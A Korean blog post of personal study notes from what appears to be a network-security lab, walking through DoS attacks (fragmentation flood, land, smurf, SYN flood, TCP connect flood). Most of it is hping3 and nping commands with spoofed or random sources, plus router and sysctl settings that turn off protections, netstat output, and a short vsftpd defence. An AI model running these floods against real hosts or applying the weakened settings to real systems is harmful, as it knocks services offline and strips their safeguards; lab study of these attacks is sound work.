Dos
- MTU를 초과하는 데이터사이즈를 보내 많은 단편화를 일으켜 부하 발생 하도록 함
-d : data size
hping3 --icmp --rand-source 10.10.10.100 -d 65000 

라우터에서 비정상적인 단편화가 탐지가 되면 아래 메시지를 보내고 해당 패킷을 Drop한다.
%IP_VFR-4-TOO_MANY_FRAGMENTS: FastEthernet0/1:
공격이 가능하게 하려면 해당 라우터 인터페이스에 아래 명령어를 실행시키면 된다.
R4(config-if)#no ip virtual-reassembly

land attack
- IP 주소로 공격
hping3 --icmp -a 192.168.0.100 34.0.0.100
> 위 주소는 static nat가 걸려있어서 IP주소가 다르지만 원래는 같은 IP주소를 넣는다.

- 포트번호로 공격
> -s : 출발지 포트 , -p : 목적지 포트 , -k : 포트번호가 증가안되고 유지됨
hping3 -a 192.168.0.100 34.0.0.100 -s 80 -k -p 80 -S 

Smurf Attack
- 공격이 먹히도록 설정변경
- 모든 서버에 아래 명령어 입력
sysctl net.ipv4.icmp_echo_ignore_broadcast=0 ( 보안설정은 1)

- 서버와 연결 되어 있는 라우터에 아래 명령어 입력
(인터페이스 양쪽 다 설정)
int fa 0/0, 0/1 
ip directed-broadcast (보안설정은 no ip directed-broadcast로 돌려놓음)

hping3 -a 20.20.20.20 192.168.0.255 --icmp
> 공격한번 보내면 4개의 응답이 보내짐(서버 수만큼 공격)


TCP SYN Flooding

FTP Server
- syncookies=0 으로 비활성화 backlog=5으로 제한 설정하기
(syncookies 란 연결 수립중인 세션은 카운트 X --> 3way가 완료된것만 카운드O)
[root@localhost dhcp]# sysctl net.ipv4.tcp_syncookies=0
net.ipv4.tcp_syncookies = 0
[root@localhost dhcp]# sysctl -a | grep "backlog"
net.core.netdev_max_backlog = 1000
net.ipv4.tcp_max_syn_backlog = 128
[root@localhost dhcp]# sysctl net.ipv4.tcp_max_syn_backlog=5
net.ipv4.tcp_max_syn_backlog = 5
[root@localhost dhcp]# 

vim /etc/vsftpd/vsftpd.conf 에서 최대 연결수 5로 하고 (max_clients=5)
공격자 pc(칼리)에서 
hping3 --rand-source 192.168.0.150 -p 21 -S --flood (flood를 붙이면 빠르고 많이 보내짐)

아래 처럼 전부 연결상태로 변함
[root@localhost dhcp]# netstat -antup | grep ":21"
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      5025/vsftpd         
tcp        0      0 192.168.0.150:21            252.163.188.113:2402        SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            30.115.73.162:2401          SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            125.15.48.12:2406           SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            2.126.39.28:2405            SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            17.85.133.57:2404           SYN_RECV    -                  

TCP Connect Flood
- 3-way과정을 과도하게 유발시켜 과부하 발생
> -c : 몇번 반복할 건지
nping --tcp-connect -p 21 -c 100000 192.168.0.150

[root@localhost dhcp]# netstat -antup | grep ":21"
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      5025/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:46119           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:46291           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:38961           ESTABLISHED 5336/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:44991           ESTABLISHED 5338/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:33855           ESTABLISHED 5330/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:34625           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:35489           ESTABLISHED 5334/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:43211           ESTABLISHED 5332/vsftpd   

방어하기

[root@localhost dhcp]# vim /etc/vsftpd/vsftpd.conf 
에서 마지막줄에 max_per_ip=2 입력 하면
공격자 pc에서 공격해도 사용자 pc에서 접속 가능

'정보보안 > 공부 기록' 카테고리의 다른 글

Iptables limit & Log  (0) 2023.01.01
get, CC, hult  (0) 2023.01.01
DNS/DHCP Attack  (0) 2023.01.01
IP/Icmp spoofing, TCP Session Hijackin  (0) 2023.01.01
모의해킹  (0) 2023.01.01

+ Recent posts